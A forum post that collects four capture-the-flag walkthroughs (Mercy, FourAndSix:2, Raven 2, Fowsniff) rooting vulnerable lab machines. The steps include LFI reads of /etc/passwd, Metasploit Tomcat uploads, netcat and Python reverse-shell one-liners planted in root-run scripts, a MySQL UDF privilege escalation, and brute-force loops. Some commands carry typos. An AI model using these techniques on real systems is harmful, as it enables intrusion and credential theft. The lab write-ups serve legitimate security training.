Login

**NINZA** · 05-14-2020, 10:06 AM

0			0

MERCY is a machine dedicated to Offensive Security for the PWK course. MERCY is a name-play and has nothing to do with the contents of the vulnerable machine. You can download the Mercy vulnerable lab from

[To see content please register here]

. The challenge is to get root on the Targeted Virtual Machine and read the proof.txt within that directory.
Flag: Proof.txt
Tables of Contents:

IP discovery and Port Scanning.
Browsing the IP on port 8080.
Decoding Base64 String.
Using Enum4linux tool for enumerating information of the Target Machine.
Getting Login Credentials to connect via smbclient.
Port Knocking.
Discovering accessible directories on the victim’s machine.
Browsing through discovered directory’s.
Searching exploits via searchsploit.
Finding Login Credentials for Tomcat Server.
Logging into Tomcat Server using Metasploit.
Exploiting Misconfiguration in the Target Machine.
Using Msfvenom for creating payload one-liner.
Getting root access.
Reading the flag.

Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.105
1
nmap -A 192.168.1.105
[Image: 2.png?w=687&ssl=1]

The NMAP output shows various open ports: 22(ssh), 53(domain), 80(http), 110(pop3), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 993(ssl/imaps), 995(ssl/pop3), 8080(http).
Since port 80 is filtered we cannot directly browse the Target IP in the Browser. Further, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. and here we got a clue as an entry /tryharder/tryharder in robot.txt as it might come in handy later on.
So we browse the Target IP on port 8080 on the browser. WOW!! at the end of the web page you notice a path “/etc/tomcat7/tomcat-users.xml” where user-related information is defined.
[Image: 3.png?w=687&ssl=1]

Hmmm!! On browsing through the discovered entry /tryharder/tryharder, it gave us a base64 encoded string.
Clearly! we need to decode it to move ahead.
[Image: 5.png?w=687&ssl=1]

On decoding the base64 string we found some Login Credentials which can be of great use later on.
[Image: 6.png?w=687&ssl=1]

Since port 445 is open on the Target Machine, We thought of enumerating it using enum4linux tool.
enum4linux

[To see content please register here]

1
enum4linux

[To see content please register here]

It gave us a few shared folders which can be further used to connect via smbclient.
[Image: 7.png?w=687&ssl=1]

Now connecting via smbclient using credentials “qiu: password”.
smbclient \\\\192.168.1.105\\qiu -U qiu
1
smbclient \\\\192.168.1.105\\qiu -U qiu
Further exploring through directories we have downloaded the config file on our Linux Desktop.
[Image: 8.png?w=687&ssl=1]

Reading the contents of the config file gave us a sequence of ports to knock which will result in opening the http port 80.
cat config
1
cat config
[Image: 9.png?w=687&ssl=1]

Knocking the sequence of ports using the following command:
knock 192.168.1.105 159 27391 4
nmap 192.168.1.105
1
2
knock 192.168.1.105 159 27391 4
nmap 192.168.1.105
Now from nmap scan, we confirmed that http port 80 got open after knocking.
[Image: 10.png?w=687&ssl=1]

Since port 80 got open, we browsed the Target IP on the browser which displayed the message as you can see in the image, which came out to be useless to further proceed towards our goal.
[Image: 11.png?w=687&ssl=1]

Now we thought of enumerating for accessible directories on the Target Machine.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

While browsing robots.txt file in the browser gave us two disallowed hidden directories as shown in the image.
[Image: 13.png?w=687&ssl=1]

Browsing through the directory 192.168.1.105/nomercy in the browser opened a vulnerability scanner webpage whose banner RIPS 0.53 left us curious to search more about it.
[Image: 14.png?w=687&ssl=1]

Then while we search RIPS 0.53 over searchsploit, it came out to be a Multiple Local File Inclusions Exploit. Next, we copied the exploit over our Linux Desktop and read the text file. Here we also copied the one-liner /windows/code.php?file=../../../../../../etc/passwd.
searchsploit rips 0.53
1
searchsploit rips 0.53
[Image: 15.png?w=687&ssl=1]

We used LFI to take a look at the content of the passwd file as it was shown in the POC.
192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd
1
192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd
[Image: 16.png?w=687&ssl=1]

Since we know there is a tomcat service running on the target system we can take a look the tomcat-users.xml file using LFI that will provide us with the username and password, exploring it on browser gave us two Login Credentials for Tomcat Server as shown on the image.
[Image: 17.png?w=687&ssl=1]

Logging into Tomcat server using Metasploit’s Tomcat Manager using the following credentials “thisisasuperduperlonguser:heartbreakisinevitable”
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable
msf exploit(multi/http/tomcat_mgr_upload) > exploit
1
2
3
4
5
6
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable
msf exploit(multi/http/tomcat_mgr_upload) > exploit
Now using a one-liner to spawn a tty shell:
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
Further logging in as user fluffy.
su fluffy
Password: freakishfluffybunny
1
2
su fluffy
Password: freakishfluffybunny
[Image: 18.png?w=687&ssl=1]

While traversing /home/fluffy/.private/secrets I notice a script “timeclock” to write the current date to /var/www/html/time that was owned by root and has FULL Permission.
cd /home
ls
cd fluffy
ls -la
cd .private
ls -la
cd secrets
1
2
3
4
5
6
7
cd /home
ls
cd fluffy
ls -la
cd .private
ls -la
cd secrets
Since the script will run every three-minute after, so we decide to edit this file by inserting our malicious code in it.
[Image: 19.png?w=687&ssl=1]

Moving on!! We need to create a bash code using Msfvenom:
msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R
1
msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R
[Image: 20.png?w=687&ssl=1]

After that append the above-generated code in the timeclock file.
echo "mkfifo /tmpmzlat; nc 192.168.1.109 8888 0</tmp/zlat | /bin/sh >/tmp/zlat 2>&1; rm /tmp/zlat" >>timclock
1
echo "mkfifo /tmpmzlat; nc 192.168.1.109 8888 0</tmp/zlat | /bin/sh >/tmp/zlat 2>&1; rm /tmp/zlat" >>timclock
[Image: 21.png?w=687&ssl=1]

Since the malicious code got executed with the timeclock file. Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python bin bash one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
Booyah!! We have got the root access and found proof.txt. We take a look at the content of the file and greeted with a congratulatory message.
[Image: 22.png?w=687&ssl=1]

FourAndSix: 2 is the sequel for previously solved vulnerable machine FourAndSix by Fred uploaded on vulnhub. It is not mandatory but is advised to read the prequel of this lab

[To see content please register here]

. You can download the FourAndSix:2 vulnerable lab from

[To see content please register here]

. The challenge is to become root and read flag.txt in the same directory.
Table of Contents:

Discovery of IP address.
Scanning for open ports and services.
Discovering universally accessible directory in the victim’s machine.
Cracking the password of archive found in the storage partition.
Reading the pub file and logging in using ssh.
Discovering utilities with sticky bit on them.
Using doas to get root.
Snagging the flag!
Let’s get started then.

The first step is, as usual, to find the IP of the target machine using netdiscover. In this case, it is 192.168.1.103
[Image: 1.png?w=687&ssl=1]

Next, we discover open ports and services using nmap.

nmap -A 192.168.1.103
1
nmap -A 192.168.1.103
The ports open were 22, 111, 2049.
[Image: 2.png?w=687&ssl=1]

There was only one way to proceed and that is port 2049. So, we used showmount command to check for NFS shared partitions.
Later, we mounted it under the folder name “raj” using the mount command. And we found a 7z compressed file.
showmount -e 192.168.1.103
mount -t nfs 192.168.1.103:/home/user/storage raj
1
2
showmount -e 192.168.1.103
mount -t nfs 192.168.1.103:/home/user/storage raj
[Image: 3.png?w=687&ssl=1]

But the file “backup.7z” was, unfortunately, password protected.
[Image: 4.png?w=687&ssl=1]

So, after trying out a number of options like John The Ripper and getting zero success, we found a site online to break its password.
The password was: chocolate
[Image: 5.png?w=687&ssl=1]

We extracted its contents in the same folder and found a few images along with RSA keys. As port 22 is running SSH service on the target machine, we can use RSA private key to login. We open RSA public key to taking a look at the username.
cat id_rsa.pub
1
cat id_rsa.pub
[Image: 6.png?w=687&ssl=1]

We tried logging in to ssh but it was asking for a passphrase. So, we created the following script to find the correct password.
cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt | while read pass; do if ssh-keygen –c –C "user@forandsix" –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done
1
cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt | while read pass; do if ssh-keygen –c –C "user@forandsix" –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done
[Image: 8.png?w=687&ssl=1]

From the id_rsa.pub file, we found the user for the secure shell of the victim and logged in to it. The password was: “12345678”.
ssh -i id_rsa [email protected]
1
ssh -i id_rsa [email protected]
We used the find utility to discover files or packages with SUID bit set on them.
find / -perm –u=s –type f 2>/dev/null
1
find / -perm –u=s –type f 2>/dev/null
We found an interesting utility with SUID bit: /usr/bin/doas which is an alternate to sudo.
After reading the “doas.conf” file, we find that “less” can be run as root.
[Image: 9.png?w=687&ssl=1]

Let’s pick the configuration file and try to understand it word by word. Doas utility executes commands as other users according to the rules in doas.conf configuration file.
Permit/Deny: allows the rule.
Nopass: the user is not required to enter any password.
Persist: After the user successfully authenticates, do not ask for a password again for some time.
Keepenv: The user’s environment is maintained.
Cmd: command is allowed to run.
Since doas configuration file says that less can be run with no password at all as root with no password, it can be used for shell escaping.
doas /usr/bin/less /var/log/authlog
1
doas /usr/bin/less /var/log/authlog
[Image: 10.png?w=687&ssl=1]

Enter v to escape to vi and then “:!sh” to escape to our brand new shell.
[Image: 11.png?w=687&ssl=1]

The final step was to snag the flag! It was in the root directory as told by the creator of the VM.
id shows that the shell is root shell and finally we read the congratulatory flag using cat!
[Image: 12.png?w=687&ssl=1]

So this was how we root the FourAndSix:2. Hope you liked it.

Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2. It is the sequel to previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get the root on target VM.
Table of Contents:

Port scanning and IP discovery.
Hitting on port 80 and the discovery of WordPress CMS.
Directory enumeration to find a directory “vendor.”
Discovering a file PATH to snag flag 1.
Discovering a file VERSION to snag the PHP version.
Exploiting RCE in PHP version 5.2.6
Making local changes in the exploit code for the successful delivery of the payload.
Getting a netcat shell using the uploaded payload.
Snagging flag 2 in /var/www
Reading database password from the wp-config file.
Running LinEnum.sh to enumerate processes.
Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db
Setting sticky bit on the find.
Getting root access.
Snagging flag4 in /root
Manually traversing system to find flag3.

Let’s get started then!
Discovering the active devices on a network using netdiscover and getting the IP address of our victim machine. In this case, the IP address holds 192.168.1.101
[Image: 1.png?w=687&ssl=1]

Using nmap on the victim machine we got three ports open 22,80 and 111
nmap -A 192.168.1.101
1
nmap -A 192.168.1.101
[Image: 2.png?w=687&ssl=1]

So we instantly moved to port 80 and discovered a website of Raven Security.
[Image: 3.png?w=687&ssl=1]

We thought it would be wise to run a directory test before we scan anything else. So we ran a directory buster test to find the “vendor” directory in the victim machine.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

Accessing /vendor the following files and folders came out.
[Image: 5.png?w=687&ssl=1]

Among them, a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!
[Image: 6.png?w=687&ssl=1]

There was yet another file worth noting called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6 but look at the previous screen again… A file exists called: PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 was of PHPMailer. So, on a bit of internet surfing, we found an RCE exploit for the version!
[Image: 7.png?w=687&ssl=1]

Now we downloaded this python file but don’t run it yet! There are some changes to be made which are highlighted in the screen below.

A coding: utf-8 tag is to be added at the top.
Set the target of vulnerability to 192.168.1.101/contact.php where this vulnerability exists (read PHPMailer’s function).
Set the backdoor’s name. Let it be backdoor.php for now.
Set the local IP in the Subprocess call.
And finally, the location to upload the backdoor in.

Now run this python script and wait for the success message.
[Image: 9.png?w=687&ssl=1]

Activate a netcat listener on port 443. It is because the backdoor gives a connection on port 443 as written in the python code (Subprocess call).
[Image: 10.png?w=687&ssl=1]

Upon opening the location of backdoor we immediately got a shell!
Now we imported a proper teletype by using the python one-liner and manually traversed to /var/www only to discover flag2!
python –c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt
1
2
3
python –c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt
Now we thought of checking the WordPress directory as we did in the prequel Raven 1.
cd html
cd wordpress
cat wp-config.php
1
2
3
cd html
cd wordpress
cat wp-config.php
We found the root database password! It was “R@v3nSecurity”
[Image: 11.png?w=687&ssl=1]

Then we changed the active directory to /tmp and imported LinEnum.sh, a script to enumerate many of the basic and advanced Linux details.
It was hosted in a folder on our local machine and was imported into the victim machine using wget command.
My local IP address was 192.168.1.109 in this case.
cd /tmp
wget

[To see content please register here]

chmod 777 LinEnum.sh
./LinEnum.sh
1
2
3
4
cd /tmp
wget

[To see content please register here]

chmod 777 LinEnum.sh
./LinEnum.sh
[Image: 12.0.png?w=687&ssl=1]

We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO:

[To see content please register here]

)

So, we searched for a UDF dynamic library exploit and it was named “1518.c” in the exploit database.

[To see content please register here]

The exploits run by compiling the raw C code to “.so” file and then transferring it to the victim machine and exploiting MySQL vulnerability.
The first step was to compile it.
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
1
2
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
[Image: 12.png?w=687&ssl=1]

And hence, we transferred this “.so” file in the /tmp directory in the victim’s machine.
wget

[To see content please register here]

chmod 777 1518.so
1
2
wget

[To see content please register here]

chmod 777 1518.so
[Image: 12.png?w=687&ssl=1]

Now we logged in to the MySQL interface.
mysql -u root -p
1
mysql -u root -p
<entered password>
After getting a MySQL shell, we started exploiting it using the vulnerability we just found
use mysql;
1
use mysql;
Now, we created a table called “foo”
In this table, we inserted the link to 1518.so file we just imported from the local machine to /tmp directory.
We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)
In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.
Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
1
2
3
4
5
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
[Image: 13.png?w=687&ssl=1]

Now we traversed back to the directory /tmp and executed commands using the find utility.
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
1
2
3
4
5
6
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
[Image: 14.png?w=687&ssl=1]

The only flag left to find was flag3.txt. You can do this with find utility but we had a bit of luck and found it manually!
It was lying in /var/www/html/wp-content/uploads/2018/11
We copied it in /var/www/html using cp.
[Image: 15.png?w=687&ssl=1]

Since it was a png file we had to view it on the browser.
[Image: 16.png?w=687&ssl=1]

Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

Hello friends! Today we are going to take another boot2root challenge known as Fowsniff. The credit for making this VM machine goes to “berzerk0” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Beginner
Flags: There is one flag (flag.txt).
Table of Contents:

Port scanning and IP discovery.
Hitting on port 80
Finding hashes on Pastebin
Decoding hashes
Brute force pop3 login
Connecting to pop3
Finding SSH username and password
Finding privilege escalation vectors
Exploiting Misconfiguration in system
Getting root access.
Reading the flags.

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target –> 192.168.1.29
Our next step is to scan our target with nmap.
nmap -A -p- -T4 192.168.1.29
1
nmap -A -p- -T4 192.168.1.29
[Image: 2.png?w=687&ssl=1]

The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 110(POP3), 143(IMAP)
We find that port 80 is running http, so we open the IP in our browser.
[Image: 3.png?w=687&ssl=1]

We don’t find anything on the webpage. Dirb scan and Nikto also didn’t reveal anything, so we googled “fowsniff corp” and found a Pastebin link that contained username and passwords. (You can find the link

[To see content please register here]

)

We cracked the hashes use this

[To see content please register here]

and find passwords to the respective email addresses. But only 8 hashes were cracked and there are 9 usernames.
[Image: 5.png?w=687&ssl=1]

So we create two wordlists one for username and one for passwords, we will use this to brute force pop3 login.
[Image: 6.png?w=687&ssl=1]

We use Metasploit-framework to brute force pop3 login. After running the brute forcing pop3 login we find the correct credentials to be “seina Confused

coobydoo2”.
msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run
1
2
3
4
5
6
msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run
[Image: 7.png?w=687&ssl=1]

We connect to pop3 service on the target server and login using the credentials we retrieved. After logging in we list the messages and find there are 2 messages.
nc 192.168.1.29 110
user seina
pass scoobydoo2
list
1
2
3
4
nc 192.168.1.29 110
user seina
pass scoobydoo2
list
[Image: 8.png?w=687&ssl=1]

We retrieved the 1st message and find that it contains the password to connect through SSH.
retr 1
1
retr 1
[Image: 9.png?w=687&ssl=1]

We retrieved the second message and find a message that hints that use the username “baksteen”.
retr 2
1
retr 2
[Image: 10.png?w=687&ssl=1]

We use the credentials “baksteen:S1ck3nBluff+secureshell” to login through SSH.
ssh [email protected]
1
ssh [email protected]
[Image: 11.png?w=687&ssl=1]

After gaining access we enumerate the system, as user “baksteen” belongs to two different groups. We use to try to find files that belong to the “users” group and find a file called “cube.sh”.
find / -group users -type f 2>/dev/null
1
find / -group users -type f 2>/dev/null
[Image: 12.png?w=687&ssl=1]

We take a look at the content of the file and find it contains the message that comes once we login through SSH.
cd /opt/cube
cat cube.sh
1
2
cd /opt/cube
cat cube.sh
[Image: 13.png?w=687&ssl=1]

We open the file with vim and add python reverse shell one-liner in the file.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[Image: 14.png?w=687&ssl=1]

We try to run it and find it gives an error “python: command is not found”. We try to locate Python and find it contains python3.
[Image: 15.png?w=687&ssl=1]

So we make changes to the exploit we change the python reverse shell one-liner. We replace python with python3.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[Image: 16.png?w=687&ssl=1]

As when we login through SSH we get a banner similar to the one that “cube.sh” contains. So we check “/etc/update-motd.d/” directory to look for executables that might run this program and find that file “00-header” runs this shell script.
[Image: 17.1.png?w=687&ssl=1]

So now we exit the SSH and set up our listener using netcat, then we again connect through SSH. So that our reverse shell gets executed.
ssh [email protected]
1
ssh [email protected]
[Image: 17.png?w=687&ssl=1]

As soon as we successfully login, we get a reverse shell as root user on our netcat listener. We go to the root directory and find the file called “flag.txt”. We take a look at the content of the file and find the congratulatory message.
nc -lvp 1234
id
cd /root
cat flag.txt
1
2
3
4
nc -lvp 1234
id
cd /root
cat flag.txt
[Image: 18.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis